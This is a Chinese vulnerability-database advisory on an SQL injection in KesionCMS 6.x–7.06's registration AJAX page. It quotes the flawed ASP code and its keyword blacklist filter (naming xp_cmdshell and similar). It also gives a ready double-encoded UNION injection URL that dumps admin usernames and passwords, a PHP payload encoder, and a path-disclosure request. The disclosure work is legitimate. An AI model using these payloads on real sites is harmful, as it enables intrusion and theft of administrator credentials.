|科讯 6.x - 7.06 SQL 注射漏洞 - VULHUB开源网络安全威胁库

科讯 6.x - 7.06 SQL 注射漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： ### 详细说明： Author:my5t3ry 转载请注明：t00ls.net 漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 - 46行和 254 -270 行代码如下： ``` Class Ajax_Check Private KS Private Sub Class_Initialize() Set KS=New PublicCls End Sub Private Sub Class_Terminate() Set KS=Nothing End Sub Public Sub Kesion() Select Case KS.S("Action") Case "checkusername" Call CheckUserName() Case "checkemail" Call CheckEmail() Case "checkcode" Call CheckCode() Case "getregform" Call GetRegForm() Case "getcityoption" Call getCityOption() End Select End Sub ……略去无关代码 Sub getCityOption() Dim Province,XML,Node Province=UnEscape(KS.S("Province")) //注意这里 Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET") RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1 If Not RS.Eof Then Set XML=KS.RsToXml(Rs,"row","") End If RS.Close : Set RS=Nothing If IsObject(XML) Then For Each Node In XML.DocumentElement.SelectNodes("row") KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>" Next End If Set XML=Nothing End Sub End Class ``` 以上代码中的Province=UnEscape(KS.S("Province")) 调用自定义函数KS.S进行过滤，接着又调用UnEscape函数解码！其中KS.S 函数与UnEscape函数原型如下: ``` Function DelSql(Str) Dim SplitSqlStr,SplitSqlArr,I SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell" SplitSqlArr = Split(SplitSqlStr,"|") For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr) If Instr(LCase(Str),SplitSqlArr(I))>0 Then Die "<script>alert('系统警告！\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP："&GetIP&";\n4、操作日期："&Now&";\n Powered By Kesion.Com!');window.close();</script>" End if Next DelSql = Str End Function '取得Request.Querystring 或 Request.Form 的值 Public Function S(Str) S = DelSql(Replace(Replace(Request(Str), "'", ""), """", "")) End Function ``` 这里编码出现混乱，产生了与php的二次编码类似的漏洞，利用比较简单，可以union： http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 上面的利用针对ACCESS，MSSQL需要改下SQL语句： ``` <?php $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin"; for ($i=0; $i<=strlen($str); $i++){ $temp .= "%25".base_convert(ord($str[$i]),10,16); } echo $temp."0"; ?> ``` 修改' `union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin`为相应的SQL语句即可。（MSSQL直接备份差异比较方便）因为解码的时候进行了CLng类型转换，提交字符可以使其报错从而爆出物理路径爆物理路径:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i ### 漏洞证明： [<img src="https://images.seebug.org/upload/201107/27201302f85fafe1a330d317c3c0134551e36bf2.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/27201302f85fafe1a330d317c3c0134551e36bf2.jpg) [<img src="https://images.seebug.org/upload/201107/272013296ad2305450b79b79ef81f75da01090ac.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/272013296ad2305450b79b79ef81f75da01090ac.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™